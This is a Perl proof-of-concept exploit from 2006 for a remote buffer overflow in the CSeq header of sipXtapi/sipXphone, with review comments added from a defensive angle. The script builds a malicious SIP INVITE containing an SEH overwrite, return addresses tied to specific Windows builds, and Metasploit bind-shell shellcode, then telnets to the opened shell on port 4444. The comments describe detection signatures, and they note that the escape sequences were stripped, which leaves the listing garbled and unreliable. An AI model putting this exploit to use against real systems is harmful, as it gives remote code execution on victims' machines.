
# Title : SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit
# Published : 2006-07-24
# Author : Jacopo Cervini


#!/usr/bin/perl
# 
# Remote Buffer Overflow in sipXtapi
# 
# bad char 0x00 0x09 0x0a 0x0d 0x20
#
# Review notes (defensive context): this proof-of-concept builds a single
# SIP INVITE and sends it as one UDP datagram to port 5060.  The only
# anomalous field is the CSeq header, whose value is several hundred bytes
# (a run of 0x41 filler followed by binary data); a valid CSeq is a small
# sequence number plus a method name, so an oversized CSeq is a simple
# IDS / SIP-proxy detection signature.  The overflow itself is in the
# receiving sipXtapi stack's header parsing, not in anything this script
# does locally; the mitigation is a vendor-fixed sipXtapi/sipXphone build
# (the page only names the version it was tested against, 2.6.0.27).
# The "bad char" list above presumably lists bytes the target's header
# parser treats as terminators (NUL and whitespace) -- TODO confirm.
#
# NOTE(review): as printed, the string literals contain the letters
# "x"/"n" rather than backslash escape sequences (e.g. "nn", "x41"), which
# looks like an extraction artifact; the listing is not meaningful as-is
# and is kept byte-identical here.


use IO::Socket;
#use strict;                     # strictures disabled: $target and $host below are
                                 # unchecked package globals; `use strict; use warnings;`
                                 # would be the first fix in any maintained script.

print "nn";
print "sipXtapi original Exploit by Michael Thumann added a real shellcode by acaronn";
print "tested on sipXphone 2.6.0.27 read the code for ret addressnn";

# Sole argument: the target host.  It is never validated, and is later
# interpolated into a shell command (see the system() call at the bottom).
if (not $ARGV[0]) {
        print "Usage: sipx.pl <host>n";
exit;}

$target=$ARGV[0];                # package global (no `my`) because strict is off
my $source ="127.0.0.1";         # address used in the Request-URI and Contact header
my $target_port = 5060;          # standard SIP signalling port; sent over UDP below
my $user ="bad";                 # NOTE(review): assigned but never used
# The two values below overwrite a structured exception handler record on
# the target; the handler address is tied to one specific DLL build, as the
# author's comments say.  SafeSEH/DEP/ASLR on later Windows releases exist
# precisely to defeat this class of overwrite.
my $nextseh = "xebx06x90x90";
my $seh="xb0x67x01x08";	# pop pop ret in jvm.dll for winxp Pro SP2 Italian universal ?
#my $seh="x27x13x02x08";	# call ebx in jvm.dll for win2k Pro SP0 Italian universal ?
#my $seh="x22x92x06x08";	# jmp ebx in jvm.dll for win2k Pro SP0 Italian universal ? 
				# if you use this ret you can exploits the target host many times
my $nop = "x90"x32;


# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
# Per the line above this is a Metasploit bind-shell payload listening on
# TCP 4444, which is the port the final telnet call connects to.  From a
# defender's view, a new listener on 4444 on a SIP endpoint is the
# host-side indicator that pairs with the network signature noted at the top.
my $shellcode = 
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x25".
"xe3xa5x9fx83xebxfcxe2xf4xd9x89x4exd2xcdx1ax5ax60".
"xdax83x2exf3x01xc7x2exdax19x68xd9x9ax5dxe2x4ax14".
"x6axfbx2exc0x05xe2x4exd6xaexd7x2ex9excbxd2x65x06".
"x89x67x65xebx22x22x6fx92x24x21x4ex6bx1exb7x81xb7".
"x50x06x2exc0x01xe2x4exf9xaexefxeex14x7axffxa4x74".
"x26xcfx2ex16x49xc7xb9xfexe6xd2x7exfbxaexa0x95x14".
"x65xefx2exefx39x4ex2exdfx2dxbdxcdx11x6bxedx49xcf".
"xdax35xc3xccx43x8bx96xadx4dx94xd6xadx7axb7x5ax4f".
"x4dx28x48x63x1exb3x5ax49x7ax6ax40xf9xa4x0exadx9d".
"x70x89xa7x60xf5x8bx7cx96xd0x4exf2x60xf3xb0xf6xcc".
"x76xb0xe6xccx66xb0x5ax4fx43x8bxb4xc3x43xb0x2cx7e".
"xb0x8bx01x85x55x24xf2x60xf3x89xb5xcex70x1cx75xf7".
"x81x4ex8bx76x72x1cx73xccx70x1cx75xf7xc0xaax23xd6".
"x72x1cx73xcfx71xb7xf0x60xf5x70xcdx78x5cx25xdcxc8".
"xdax35xf0x60xf5x85xcfxfbx43x8bxc6xf2xacx06xcfxcf".
"x7cxcax69x16xc2x89xe1x16xc7xd2x65x6cx8fx1dxe7xb2".
"xdbxa1x89x0cxa8x99x9dx34x8ex48xcdxedxdbx50xb3x60".
"x50xa7x5ax49x7exb4xf7xcex74xb2xcfx9ex74xb2xf0xce".
"xdax33xcdx32xfcxe6x6bxccxdax35xcfx60xdaxd4x5ax4f".
"xaexb4x59x1cxe1x87x5ax49x77x1cx75xf7xd5x69xa1xc0".
"x76x1cx73x60xf5xe3xa5x9f";
# CSeq value: 204 filler bytes, then the two SEH values, the NOP run and the
# payload.  Its length alone distinguishes this INVITE from legitimate traffic.
my $cseq =("x41"x204).$nextseh.$seh.$nop.$shellcode;


# Minimal INVITE.  Every header except CSeq is well-formed; the addresses
# are the target's own, so the request does not need a real registration.
my $packet =<<END;
INVITE sip:user@$source SIP/2.0r
To: <sip:$target:$target_port>r
Via: SIP/2.0/UDP $target:3277r
From: "moz"<sip:$target:3277>r
Call-ID: 3121$targetr
CSeq: $cseqr
Max-Forwards: 70r
Contact: <sip:$source:5059>r
r
END

print "Sending Packet to: " . $target . "nn";
# Bareword filehandle and an unchecked socket() return value.  inet_aton()
# yields undef for an unresolvable host, and that is not checked either; the
# failure would only surface at the send() below.
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);
# One datagram; a short send counts as failure.  No response is read.
send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!n";
print "Done.n";
$host = $ARGV[0];                # same value as $target, again a package global

print " + connect to $host on port 4444...n";

# NOTE(review): $host comes straight from the command line and is interpolated
# into a shell string, so shell metacharacters in the argument are executed
# locally by this script.  The list form, system('telnet', $host, '4444'),
# bypasses the shell; the exit status is also not checked.
system("telnet $host 4444");
